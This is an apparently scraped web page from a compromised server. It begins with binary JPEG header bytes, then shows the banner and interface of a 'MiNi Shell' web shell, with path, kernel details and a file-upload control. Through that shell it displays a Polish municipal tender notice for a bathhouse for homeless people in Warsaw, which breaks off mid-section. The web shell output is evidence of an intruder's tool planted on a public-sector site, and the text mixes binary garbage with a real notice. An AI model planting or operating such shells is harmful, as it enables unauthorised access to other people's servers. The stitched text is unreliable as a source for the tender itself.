JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231016/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231016/0044615201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa łaźni publicznej z przeznaczeniem dla osób bezdomnych wraz z niezbędną infrastrukturą techniczną, na działce nr ew. 12 z obrębu 5-02-02 przy ul. Wenedów w Warszawie w Dzielnicy Śródmieście </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Mienia m.st. Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Kazimierza 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-248</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0222770317</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">Eburza@zmw.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zmw.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administrowanie i zarządzanie mieniem Miasta Stołecznego Warszawy. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa łaźni publicznej z przeznaczeniem dla osób bezdomnych wraz z niezbędną infrastrukturą techniczną, na działce nr ew. 12 z obrębu 5-02-02 przy ul. Wenedów w Warszawie w Dzielnicy Śródmieście </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dc9a9fcc-6c23-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00446152</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00059449/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa łaźni dla osób bezdomnych przy ul. Wenedów.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zmw-waw.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zmw-waw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w niniejszym<br/>postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>zakupowej pod adresem https://zmw-waw.ezamawiajacy.pl zwanej dalej Platformą lub Systemem.<br/>2. Przekazanie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania na Platformie, zgodnie z poniższą kolejnością.<br/>3. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Rejestracja Wykonawcy na Platformie<br/>następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. W<br/>uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) weryfikacja danych Wykonawcy może<br/>trwać maksymalnie do 2 dni roboczych. Mając to na uwadze, Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego<br/>na rejestrację w procesie złożenia Oferty w formie elektronicznej lub w postaci elektronicznej.<br/>4. Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:<br/>• Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>5. Dopuszczalne wielkości i formaty przesyłanych danych<br/>• Wielkość pojedynczego pliku zamieszczanego w systemie nieprzekraczająca 100 MB;<br/>• Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,<br/>wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,<br/>XMLsig, XAdES, CAdES, ASIC, XMLenc<br/>Pozostałe zapisy dostępne w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Miasto Stołeczne Warszawa - Zarząd Mienia m.st. Warszawy, ul. Jana<br/>Kazimierza 62, 01-248 Warszawa.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>auditor@auditorsecurity.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy Prawo zamówień publicznych (tj. Dz. U. z 2021 r. poz.1129 z późn. zm.) – dalej PZP.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">13/TP/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa łaźni publicznej z przeznaczeniem dla osób bezdomnych wraz z niezbędną infrastrukturą techniczną, na działce nr ew. 12 z obrębu 5-02-02 przy ul. Wenedów w Warszawie w Dzielnicy Śródmieście <br/>1.	Celem postępowania jest wyłonienie Wykonawcy robót budowlanych, polegających na budowie łaźni publicznej z przeznaczeniem dla osób bezdomnych wraz z niezbędną infrastrukturą techniczną, na działce nr ew. 12 z obrębu 5-02-02 przy ul. Wenedów w Warszawie w Dzielnicy Śródmieście, kategoria obiektu budowlanego XI.<br/>2.	Projektowany budynek publicznej łaźni dla osób bezdomnych będzie użytkowany jako obiekt użyteczności publicznej o funkcji usługowej, wraz z niezbędnymi pomieszczeniami pomocniczymi służącymi realizacji tych funkcji. Teren inwestycji jest częścią Parku im. Romualda Traugutta ujętego w gminnej ewidencji zabytków m.st. Warszawy. Ponadto teren inwestycji leży na obszarze Pomnika Historii „Warszawa - historyczny zespół miasta z Traktem Królewskim i Wilanowem.<br/>3.	Zaprojektowany budynek jest obiektem jednokondygnacyjnym w układzie przestrzennym opartym o trzy nieregularne w formie ramiona, w których zlokalizowane są poszczególne funkcje: higieniczno-sanitarne, administracyjne i zapleczowo-magazynowe. Ramiona spinane są poprzez wewnętrzne, niezadaszone patio. Budynek posadowiony jest na płycie fundamentowej. Ściany zaprojektowano jako trójwarstwowe, których wewnętrzną warstwę stanowi ściana żelbetowa, środkowa izolacja termiczna z wełny mineralne, a zewnętrzną, jednocześnie stanowiącą elewację budynku, ściana murowana z cegieł ceramicznych elewacyjnych. Przykrycie budynku stanowi stropodach żelbetowy, niewentylowany z zielenią ekstensywną. <br/>4.	Budynek przewiduje się podłączyć do miejskiej sieci elektroenergetycznej, wodociągowej, kanalizacji sanitarnej oraz ciepła systemowego. Odprowadzenie wód opadowych i roztopowych na teren nieruchomości. <br/>5.	Przedmiot zamówienia został szczegółowo opisany w OPZ stanowiącym Załącznik nr 7 do SWZ <br/>6.	Zamawiający oświadcza, że jest uprawniony do dysponowania nieruchomością zlokalizowaną przy ul. Wenedów w Warszawie w Dzielnicy Śródmieście, na działce nr ew. 12 z obrębu 5-02-02, na cele budowlane.<br/>7.	Zamawiający posiada wymaganą do prowadzenia robót decyzję pozwolenia na budowę łaźni publicznej z przeznaczeniem dla osób bezdomnych wraz z niezbędną infrastrukturą techniczną, na działce nr ew. 12 z obrębu 5-02-02 przy ul. Wenedów w Warszawie w Dzielnicy Śródmieście (decyzja nr 296/Ś/2021 z dnia 06.10.2021r.). Ponadto 28.07.2023r. wydane zostało zaświadczenie o braku podstaw do wniesienia sprzeciwu do złożonego zgłoszenia budowy przyłącza wodociągowego i kanalizacyjnego wraz z przebudową i rozbiórką doziemnej infrastruktury na potrzeby planowanej inwestycji „Łaźni publicznej z przeznaczeniem dla osób bezdomnych” na terenie działek ewid. nr 1, 4, 12 z obrębu 5-02-02 oraz działek ewid. nr 6, 21 z obrębu 5-02-01 w Dzielnicy Śródmieście (znak sprawy: UD-IX-WAB.6743.196.2023.MDU).<br/>8.	Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji projektowej (projekt budowlany i techniczny) dostępnej na stronie: <br/>https://pliki.um.warszawa.pl/index.php/s/AsYRs3YtDKsDSkK </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45442000-7 - Nakładanie powierzchni kryjących</p> <p class="mb-0">31210000-1 - Elektryczna aparatura do wyłączania lub ochrony obwodów elektrycznych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45232142-9 - Roboty budowlane w zakresie stacji przesyłu ciepła</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">420 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie okresu wykonania przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmi udzielonych na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. Zamawiający wymaga od Wykonawców spełnienia niżej wymienionych warunków udziału w postepowaniu:<br/>1) W zakresie zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający dokonana oceny spełniania ww. warunku poprzez weryfikację wpisu w internetowych ogólnodostępnych i<br/>bezpłatnych bazach danych. Warunek zostanie uznany za spełniony, jeżeli Wykonawca posiada wpis i prowadzi działalność<br/>gospodarczą.<br/>2) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Zamawiający nie stawia warunku.<br/>3) W zakresie sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga posiadania dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej (OC) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumą gwarancyjną nie<br/>mniejszą niż: 2 000.000,00 zł. (dwa miliony złotych)<br/>Zamawiający dokona oceny spełniania ww. warunku w oparciu o kopię złożonego dokumentu.<br/>4) W zakresie zdolności technicznej lub zawodowej:<br/>1. Wykonawca potwierdzi spełnienie warunku jeżeli wykaże, że:<br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, realizował jako Wykonawca lub Podwykonawca co najmniej 2 roboty budowlane o podobnym charakterze do<br/>przedmiotu zamówienia tj. łaźnię, basen, noclegownię, schronisko, hotel, szkołę, przedszkole, polegające na wykonaniu<br/>robót żelbetowych, murarskich, elewacyjnych, ziemnych, nawierzchni drogowych o łącznej wartości co najmniej jednej<br/>inwestycji w wysokości min. 3 mln zł brutto (trzy miliony złotych). Na potwierdzenie spełnienia niniejszego warunku<br/>Wykonawca jest zobligowany do przedstawienia Oświadczenia - Wykaz robót budowalnych - Załącznik nr 5 do SWZ wraz z<br/>dowodami określającymi czy te roboty budowlane zostały wykonane należycie. Dokumenty nie są wymagane od<br/>Wykonawców, którzy wykonywali roboty budowlane na rzecz Zamawiającego w okresie ostatnich 3 lat.<br/>Zamawiający dokona oceny spełniania ww. warunku w oparciu o: Oświadczenie wykaz robót budowlanych – Załącznik nr 